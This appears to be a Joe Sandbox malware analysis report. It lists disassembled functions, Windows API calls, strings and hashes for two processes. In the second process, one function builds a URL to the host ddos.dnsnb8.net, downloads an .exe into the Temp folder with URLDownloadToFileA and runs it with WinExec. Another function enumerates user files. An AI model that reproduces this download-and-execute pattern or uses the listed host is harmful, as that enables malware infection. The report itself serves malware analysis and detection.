Instruction ID: 386dad546ae3ee6facd522547f2789e0b0893060b3c0379e512b7a46b385323c
Opcode Fuzzy Hash: 47c8b048b90f4a39332f367b4157c1dffe310d981b80df09f713873d210ea5e8
Instruction Fuzzy Hash: 95215370940314A9EB14BB72AE5EB6F2664AF0074CF10487FF501BA1C2EAFC8A409B5D

Function 004014E0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 0040150B
__open.LIBCMT ref: 0040157A
_fprintf.LIBCMT ref: 0040159C
__read.LIBCMT ref: 004015CC
__close.LIBCMT ref: 004015D9
_strncmp.LIBCMT ref: 00401617
_calloc.LIBCMT ref: 004016A9
__execv.LIBCMT ref: 0040173B
_fprintf.LIBCMT ref: 00401752

Strings

-script.pyw, xrefs: 00401558
Could not exec %s, xrefs: 00401744
#!python.exe, xrefs: 00401623
Cannot find Python executable %s, xrefs: 00401687
Cannot open %s, xrefs: 0040158E

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: _fprintf$FileModuleName__close__execv__open__read_calloc_strncmp
String ID: #!python.exe$-script.pyw$Cannot find Python executable %s$Cannot open %s$Could not exec %s
API String ID: 2502740745-3972628896
Opcode ID: c8bd083479423ee5b9adf750b0dfbc56fca52a883853dc4c193cfd766892fb70
Instruction ID: 796e4f919e2f8e9c448ad3e98618f95884ab6d66caa4008a2a0434ec9930ee7c
Opcode Fuzzy Hash: c8bd083479423ee5b9adf750b0dfbc56fca52a883853dc4c193cfd766892fb70
Instruction Fuzzy Hash: A07136719043419BD320EF65D885B9B73E8AFD8304F14493EF489A73E1E639E9448B9B

Function 004021B8 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 004021C0

Part of subcall function 0040218D: GetModuleHandleW.KERNEL32(mscoree.dll,?,004021C5,?,?,00406AFB,000000FF,0000001E,?,0040399D,?,00000001,?,?,00403E83,00000018), ref: 00402197
Part of subcall function 0040218D: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004021A7

ExitProcess.KERNEL32 ref: 004021C9

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
Instruction ID: 4f065410a833747b2fa51117dbabb5f5d23e2195355c7fa658f3e8009557e2db
Opcode Fuzzy Hash: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
Instruction Fuzzy Hash: F4B09B31000158BBDB012F23DD4DC4D7F55DB403917104035F914190B1DFB1AD5299D4

Function 004064D7 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004064EC

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
Instruction ID: fc63dde57cecbdf2c2aaf7bb1ec022fcb12f636a59951f49be284e9b9c4476cd
Opcode Fuzzy Hash: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
Instruction Fuzzy Hash: A9D05E72A903455AEB145F75BE08B623BDCD784795F00843AB80DC6190E5B4D5609948

Function 004023D4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 004023E0

Part of subcall function 004022A8: __lock.LIBCMT ref: 004022B6
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 004022ED
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402302
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040232C
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402342
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040234F
Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040237E
Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040238E

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 56d6ec75f9ca001e469de65b509690461a690c23f8048b21a9ddfe31d5bb7ce0
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D5B0927258020833EA202582AC07F063B1987C0B64E240066BA0C295E1A9A6A961808A

Non-executed Functions

Function 00401EE2 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00404454
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404469
UnhandledExceptionFilter.KERNEL32(0040E2D4), ref: 00404474
GetCurrentProcess.KERNEL32(C0000409), ref: 00404490
TerminateProcess.KERNEL32(00000000), ref: 00404497

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 23da0d9ffc51f7e3674ec70a0344f5b5beb142691558593c3537b45a2856aa59
Instruction ID: a2c1d01f0a8fc7b860fa4c5ba8dee9755c81e3f17099ada6bc54c17834eb60e6
Opcode Fuzzy Hash: 23da0d9ffc51f7e3674ec70a0344f5b5beb142691558593c3537b45a2856aa59
Instruction Fuzzy Hash: 3E21FEB4401210EFD740DF65FA856893BB4FB48300F1184BAEA08E76B0E3F859A48F1D

Function 00406000 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005FBE), ref: 00406005

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 03e2138c96defe5f6c4322f41c97ea28f6cc5d0ca766cf02e782f863edac97cf
Instruction ID: 276ab158461ab0854dff8c4ba172e82da5abdd5be2fa13cd776f410961e88b47
Opcode Fuzzy Hash: 03e2138c96defe5f6c4322f41c97ea28f6cc5d0ca766cf02e782f863edac97cf
Instruction Fuzzy Hash: 7890026125252196D60027715E0968776D49A5960676109716212E4094DABC8054991A

Function 00417B71 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction ID: 7b357e6e517895dbe12adbe9a7f777a7b357507db5a8af5602780b1ce824b875
Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction Fuzzy Hash: 79819531608B458FC714DF29D8906EAB7E2EFD6314F14892ED0EA87751D738A889CB49

Function 004010A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsplitpath.LIBCMT ref: 004010FA
__wsplitpath.LIBCMT ref: 00401133
__wmakepath.LIBCMT ref: 00401186
_calloc.LIBCMT ref: 00401192
_strncpy.LIBCMT ref: 004011A7
_calloc.LIBCMT ref: 004011B8
_strncpy.LIBCMT ref: 004011C6

Strings

\, xrefs: 0040114B
\, xrefs: 0040110D

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: __wsplitpath_calloc_strncpy$__wmakepath
String ID: \$\
API String ID: 550690-164819647
Opcode ID: 6b08398ac8986faab224cc4e25f628c45a334c78e1b91678b68513e9d93174b4
Instruction ID: ff4e68a8fe18fc9b97d4bba43c3c323c9ca1ce8c53413bd27601e723a30b8d8d
Opcode Fuzzy Hash: 6b08398ac8986faab224cc4e25f628c45a334c78e1b91678b68513e9d93174b4
Instruction Fuzzy Hash: 9F316CB1404380AED325DB10CC81FEBB3E8AF89704F04496EF7C567191E378994887AB

Function 00401350 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60processsynchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401375
SetConsoleCtrlHandler.KERNEL32 ref: 0040138C
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,?,00000001), ref: 004013AF
_fprintf.LIBCMT ref: 004013C7
WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 004013E6
GetExitCodeProcess.KERNEL32(00000001,00000000), ref: 004013F5

Strings

failed to create process., xrefs: 004013B9
D, xrefs: 00401384
failed to get exit code from process., xrefs: 004013FF

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: Process$CodeConsoleCreateCtrlExitHandlerObjectSingleWait_fprintf_memset
String ID: D$failed to create process.$failed to get exit code from process.
API String ID: 1493708761-2047806753
Opcode ID: d0de34054ce82bd43d2fe410723fc00cfad17156a394d383c3c61f2657a6dedf
Instruction ID: 34a530c21fcf4aab6bb134418fb42986268233c3b95e978881f8daa222adcb36
Opcode Fuzzy Hash: d0de34054ce82bd43d2fe410723fc00cfad17156a394d383c3c61f2657a6dedf
Instruction Fuzzy Hash: D31191B0648301AFE310EF65CD46F1B77E8AB84B04F108D2DF659E62D0E6B8D5188B5A

Function 004046C5 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004046D1

Part of subcall function 0040516E: __getptd_noexit.LIBCMT ref: 00405171
Part of subcall function 0040516E: __amsg_exit.LIBCMT ref: 0040517E

__amsg_exit.LIBCMT ref: 004046F1
__lock.LIBCMT ref: 00404701
InterlockedDecrement.KERNEL32(?), ref: 0040471E
InterlockedIncrement.KERNEL32(009A1660), ref: 00404749

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: bfb2d015a437bf2f75142ed56999e104d6438876da5dba3a6470cb0087768ea4
Instruction ID: 762af939121588747dd0ca135b41566db6ae5fc7b386992e2f1cba590a1bc26f
Opcode Fuzzy Hash: bfb2d015a437bf2f75142ed56999e104d6438876da5dba3a6470cb0087768ea4
Instruction Fuzzy Hash: EE01EDB1901621ABC720AF2698067AE7664BB41755F04813BEA60772D0CB3C6D01CFDD

Function 00403ABD Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00403ADB

Part of subcall function 00403EF9: __mtinitlocknum.LIBCMT ref: 00403F0F
Part of subcall function 00403EF9: __amsg_exit.LIBCMT ref: 00403F1B
Part of subcall function 00403EF9: EnterCriticalSection.KERNEL32(?,?,?,004019E7,?), ref: 00403F23

___sbh_find_block.LIBCMT ref: 00403AE6
___sbh_free_block.LIBCMT ref: 00403AF5
HeapFree.KERNEL32(00000000,?,0040F578,0000000C,0040515F,00000000,?,0040399D,?,00000001,?,?,00403E83,00000018,0040F5E0,0000000C), ref: 00403B25
GetLastError.KERNEL32(?,0040399D,?,00000001,?,?,00403E83,00000018,0040F5E0,0000000C,00403F14,?,?,?,004019E7,?), ref: 00403B36

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: a12cb5a377b960506db2246119b09161ccaed8dd57b3f76921e50dc72fc51c3a
Instruction ID: 0fc8657c13906ab74fcdd902c6ebe0ed0f7107b6a60225d746b313d4028bb8d5
Opcode Fuzzy Hash: a12cb5a377b960506db2246119b09161ccaed8dd57b3f76921e50dc72fc51c3a
Instruction Fuzzy Hash: 64015EB1941305AADA306FA2980AB5B7E689B0072AF10853FF104B61C2CA7C9A408A5C

Function 00401410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 00401469
_sprintf.LIBCMT ref: 00401477
_sprintf.LIBCMT ref: 004014A9

Strings

%s, xrefs: 004014A3

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: _sprintf$_calloc
String ID: %s
API String ID: 1847391153-3874713491
Opcode ID: 506ba3259ec5662ead1a3bac2a13b86467e90f765512d11c77d13c91b1884411
Instruction ID: 3e0aaedb16861467738b36e15ffebac14c8137eedcf37fbcf32618918a6528ec
Opcode Fuzzy Hash: 506ba3259ec5662ead1a3bac2a13b86467e90f765512d11c77d13c91b1884411
Instruction Fuzzy Hash: B72138312042025FC311CF1CC494EE6B3E69F86348F15456AF885EB2B2DA76E90E87D5

Function 0040A2E4 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040A318
__isleadbyte_l.LIBCMT ref: 0040A34C
MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A37D
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A3EB

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 4f57c0c18d61a66ad97d6be7dec4c5e608a13d2facb429ccd72208ac479570c4
Instruction ID: ecb9902cf17e40a010e2e2b1b54a430317f3bb45ddcf6aa4964fa5cd43223a8d
Opcode Fuzzy Hash: 4f57c0c18d61a66ad97d6be7dec4c5e608a13d2facb429ccd72208ac479570c4
Instruction Fuzzy Hash: C531D031A00346EFDB20DF64C8949AE3BA5FF01310B1589BAE861AB2D1D734DD60DB5A

Function 00404E31 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00404E3D

Part of subcall function 0040516E: __getptd_noexit.LIBCMT ref: 00405171
Part of subcall function 0040516E: __amsg_exit.LIBCMT ref: 0040517E

__getptd.LIBCMT ref: 00404E54
__amsg_exit.LIBCMT ref: 00404E62
__lock.LIBCMT ref: 00404E72

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 3dcc82b5a170c8cf9336be6d49bee876bb3b912368579d21efbebef048838667
Instruction ID: 09d2f9d651c6c409bc02885c121a8a6903a39f7021fc6d6957eb733fdf563978
Opcode Fuzzy Hash: 3dcc82b5a170c8cf9336be6d49bee876bb3b912368579d21efbebef048838667
Instruction Fuzzy Hash: ADF062B69407008AD630BB75D80674F76907F40725F15823FF6407B2D2CB7C5901CA99

Analysis Process: IivJTsFD.exePID: 4908, Parent PID: 5924COMMON

Execution Graph

Execution Coverage:	32.2%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	18.9%
Total number of Nodes:	297
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 002529E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00252A02
wsprintfA.USER32 ref: 00252A1A
memset.MSVCRT ref: 00252A44
lstrlen.KERNEL32(?), ref: 00252A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00252A6C
strrchr.MSVCRT ref: 00252A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00252A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00252AAE
memset.MSVCRT ref: 00252AC6
memset.MSVCRT ref: 00252ADA
FindFirstFileA.KERNEL32(?,?), ref: 00252AEF
memset.MSVCRT ref: 00252B13
lstrcmpiA.KERNEL32(?,?), ref: 00252B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00252B67
FindClose.KERNEL32(00000000), ref: 00252B6E

Strings

%s*, xrefs: 00252A14
C:\, xrefs: 00252A2F
Documents and Settings, xrefs: 00252A8D, 00252A92, 00252A9A, 00252AAD

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 5639278f1f9dde3565bd13f5ce79666c81df7ec6dc92c94be84b33648746e6af
Instruction ID: 88c21ee6ae57e6945dfe6ddbf084cf847d8832cbe92724d2f6863e6ec8d73466
Opcode Fuzzy Hash: 5639278f1f9dde3565bd13f5ce79666c81df7ec6dc92c94be84b33648746e6af
Instruction Fuzzy Hash: 614174B2414349EFD721DFA0EC4DEDB77ACEB85356F04082AF944D2091E634D65C8BAA

Function 00251099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0025185B: GetSystemTimeAsFileTime.KERNEL32(00251F92,00000000,?,00000000,?,?,?,00251F92,?,00000000,00000002), ref: 00251867
Part of subcall function 0025185B: srand.MSVCRT ref: 00251878
Part of subcall function 0025185B: rand.MSVCRT ref: 00251880
Part of subcall function 0025185B: srand.MSVCRT ref: 00251890
Part of subcall function 0025185B: rand.MSVCRT ref: 00251894

WinExec.KERNEL32(?,00000005), ref: 002510F1
lstrlen.KERNEL32(00254748), ref: 002510FA
wsprintfA.USER32 ref: 0025112A
wsprintfA.USER32 ref: 00251143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0025115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00251169
Sleep.KERNEL32 ref: 00251179

Strings

%s%.8X.exe, xrefs: 00251124
C:\Users\user\AppData\Local\Temp\, xrefs: 00251119
http://%s:%d/%s/%s, xrefs: 002510C2, 00251141
cj/, xrefs: 00251135
ddos.dnsnb8.net, xrefs: 002510C8, 002510CF, 00251140, 00251168
HG%, xrefs: 0025112C

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG%$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-895877583
